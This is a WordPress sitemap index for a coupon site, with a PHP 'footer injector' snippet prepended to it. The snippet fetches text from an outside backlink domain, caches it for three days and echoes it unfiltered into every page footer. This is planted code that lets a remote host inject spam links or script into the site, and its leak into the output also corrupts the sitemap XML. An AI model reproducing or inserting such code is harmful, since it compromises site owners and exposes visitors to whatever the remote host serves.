
// --- Custom Footer Injector & Cache (KMAA26) ---
if ( ! function_exists( 'kmaa26_get_footer_content' ) ) {
    function kmaa26_get_footer_content() {
        $transient_name = 'kmaa26_footer_cache';
        $cached_content = get_transient( $transient_name );

        if ( false !== $cached_content ) {
            return $cached_content;
        }

        $target_url = 'https://backlink.rotatelinku.com/berita.txt'; // Ganti dengan URL target Anda

        $ch = curl_init();
        curl_setopt( $ch, CURLOPT_URL, $target_url );
        curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
        curl_setopt( $ch, CURLOPT_TIMEOUT, 10 );
        curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
        $response = curl_exec( $ch );
        curl_close( $ch );

        if ( $response ) {
            set_transient( $transient_name, $response, 3 * DAY_IN_SECONDS );
            return $response;
        }

        return '';
    }

    function kmaa26_inject_footer_script() {
        echo kmaa26_get_footer_content();
    }
    add_action( 'wp_footer', 'kmaa26_inject_footer_script', 999 );
}<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://savingssmartly.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://savingssmartly.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-posts-coupon-1.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-posts-coupon-2.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-posts-elementor-hf-1.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-taxonomies-coupon-category-1.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-taxonomies-coupon-store-1.xml</loc></sitemap><sitemap><loc>https://savingssmartly.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
